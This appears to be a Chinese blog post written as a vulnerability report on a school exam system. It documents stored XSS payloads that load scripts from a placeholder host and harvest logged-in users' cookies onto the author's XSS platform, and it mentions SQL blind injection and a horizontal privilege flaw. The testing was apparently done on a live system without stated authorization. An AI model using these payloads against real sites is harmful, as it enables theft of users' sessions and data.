记录一次对学校考试系统的漏洞挖掘

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接: https://blog.csdn.net/chest_/article/details/101565259

引言~

最近学校由于方便我们学生的平时测试,所以新开了个考试系统,闲着无聊我就抱着玩的心态去测试了一波,由于本篇是用来锻炼我未来写报告的能力,所以格式会稍有变化


正文开始

标题:中国职工电化教育中心处考试系统处存在存储型xss
漏洞类别:事件型漏洞
厂商信息:中国职工电化教育中心
漏洞类型:xss(存储型)
漏洞等级:中危
漏洞简述:该页面在未检验数据是否存在XSS代码的情况下,便将其存入数据库。而且当下一次从数据库中获取该数据时程序也未对其进行过滤,页面会再次执行插入的恶意XSS代码,存储型XSS可以持续攻击用户。当目标用户进入含有xss恶意代码的页面时,存放在服务器的xss代码会从服务器解析之后加载出来。受害者只要访问插入xss攻击的页面,恶意脚本就能成功能够盗取当前登录用户的cookie,能造成用户敏感信息的泄露,可以配合csrf进行钓鱼攻击



复现步骤

一.往可能存在xss漏洞的输入框(25题笔记)构造以下代码进行验证:

"> <script src="http://xxx.com/myjs/alert.js"></script>

在这里插入图片描述
成功出现弹窗,初步判断存在xss漏洞
在这里插入图片描述

相关验证:在考试结果页面测试xss弹窗时,如果不点击确定在本页面弹出的xss窗口,那么与该页面关联的其它页面会出现卡死,导致与之关联的页面无法正常使用

在这里插入图片描述
关闭该页面退出重新进去后,发现页面重新xss弹窗,这时候可以确定,xss的类型为存储型xss
在这里插入图片描述

二.利用自建xss平台插入js验证代码来获取用户敏感信息

“> <script src="http://xxx.com/myjs/cs.js"></script>

在这里插入图片描述
插入攻击语句时,f12可以清楚的看到页面加载了我的xss平台

在这里插入图片描述
语句插入成功后,到xss平台观看效果
在这里插入图片描述
不难看出xss平台准确的列出登录用户的敏感信息,以及要请求访问的页面,因为是测试,所以我的xss代码没做过多的处理,如果有不法分子通过高明的手法构造xss语句来获取非法的用户敏感信息,后果将不堪设想!!!

关闭该页面退出重新进入
在这里插入图片描述
发现xss弹窗仍在
在这里插入图片描述
而且xss平台再次接收到了页面访问者的敏感信息
在这里插入图片描述

到此,漏洞复现完毕,可以确定页面存在存储型xss

补充:修改信息处也存在xss存储型漏洞,而且考试页面存在sql时间盲注,(由于是内网服务器,顺手测试并没有截到相关图片),但由于盲注太过麻烦,所以没有复现

除了xss漏洞外,
通过改URL地址栏可以查看不同用户信息,证明对用户的身份不做效验,有可能存在水平越权漏洞!!
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/chest_/article/details/101565259